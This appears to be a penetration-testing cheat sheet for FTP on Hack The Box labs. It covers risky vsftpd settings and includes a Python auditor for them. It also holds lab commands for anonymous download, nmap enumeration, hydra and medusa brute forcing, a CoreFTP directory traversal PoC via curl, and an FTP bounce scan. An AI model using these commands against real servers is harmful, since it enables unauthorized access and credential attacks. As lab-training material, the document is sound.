# [21] FTP

Default configuration: `/etc/vsftpd.conf`

Deny users file: `/etc/ftpusers`

Dangerous Configuration:

| **Setting**                    | **Description**                                                                                   |
| ------------------------------ | ------------------------------------------------------------------------------------------------- |
| `anonymous_enable=YES`         | Allows anonymous login.                                                                           |
| `anon_upload_enable=YES`       | Allows anonymous users to upload files.                                                           |
| `anon_mkdir_write_enable=YES`  | Allows anonymous users to create new directories.                                                 |
| `no_anon_password=YES`         | Does not ask anonymous users for a password.                                                      |
| `anon_root=/home/username/ftp` | Directory for anonymous users.                                                                    |
| `write_enable=YES`             | Allows the FTP commands STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE.                         |
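
These settings interact: the anonymous write options only take effect when `write_enable` is also on, and a missing `anonymous_enable` line falls back to the built-in default. The following Python auditor is an added example, not part of the original notes; its default values are taken from the upstream vsftpd.conf man page, and `SAMPLE` and the finding names are constructed for illustration.

```python
# Added example: flag the risky vsftpd.conf settings from the table above.
# DEFAULTS are the upstream vsftpd.conf(5) defaults (assumption: your distro's
# packaged config may override them explicitly).
DEFAULTS = {"anonymous_enable": "YES", "write_enable": "NO",
            "anon_upload_enable": "NO", "anon_mkdir_write_enable": "NO",
            "no_anon_password": "NO"}

def parse_vsftpd_conf(text):
    """Return effective options; a later assignment overrides an earlier one."""
    opts = dict(DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue  # blank line, comment, or not an option=value line
        key, value = line.split("=", 1)
        opts[key] = value
    return opts

def audit(text):
    """Return finding ids for settings that are actually in effect."""
    opts = parse_vsftpd_conf(text)
    def on(key):
        # Boolean spellings treated as enabled here.
        return opts.get(key, "NO").upper() in ("YES", "TRUE", "1")
    findings = []
    if on("anonymous_enable"):
        findings.append("anonymous_login")
        if on("no_anon_password"):
            findings.append("anonymous_no_password_prompt")
        # Anonymous write options need write_enable=YES to have any effect.
        if on("write_enable") and on("anon_upload_enable"):
            findings.append("anonymous_upload")
        if on("write_enable") and on("anon_mkdir_write_enable"):
            findings.append("anonymous_mkdir")
    if on("write_enable"):
        findings.append("write_commands_enabled")
    return findings

# Constructed sample config, not taken from a real host.
SAMPLE = """\
anonymous_enable=NO
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
#anon_mkdir_write_enable=YES
anon_root=/home/username/ftp
"""

if __name__ == "__main__":
    print(audit(SAMPLE))
```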

```bash
#Connect to FTP Server
Intrusionz3r0X@htb[/htb]$ ftp 10.129.14.136
Intrusionz3r0X@htb[/htb]$ nc -nv 10.129.14.136 21
Intrusionz3r0X@htb[/htb]$ telnet 10.129.14.136 21
# Connect to FTP with TLS/SSL encryption
Intrusionz3r0X@htb[/htb]$ openssl s_client -connect 10.129.14.136:21 -starttls ftp

#Download All Available Files
Intrusionz3r0X@htb[/htb]$ wget -m --no-passive ftp://anonymous:anonymous@10.129.14.136

#Nmap Enumeration
Intrusionz3r0X@htb[/htb]$ sudo nmap -sV -p21 -sC -A 10.129.14.136 #--script-trace

#Brute Force
Intrusionz3r0X@htb[/htb]$ medusa -U users.list  -P passwords.list  -h 10.129.23.100 -M ftp -t 30 -F #-n 2121
Intrusionz3r0X@htb[/htb]$ hydra -L users.list -P passwords.list ftp://10.129.202.221 -t 64

#CoreFTP Server build 725 - Directory Traversal (Authenticated)
Intrusionz3r0X@htb[/htb]$ curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
```

**FTP Bounce Attack**

An FTP bounce attack is a network attack that uses an FTP server to deliver outbound traffic to another device on the network. The attacker uses the `PORT` command to trick the FTP server into opening its connection to a device other than the intended one, running commands against that device and getting information from it.

```bash
#FTP Bounce Attack
Intrusionz3r0X@htb[/htb]$ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2
```
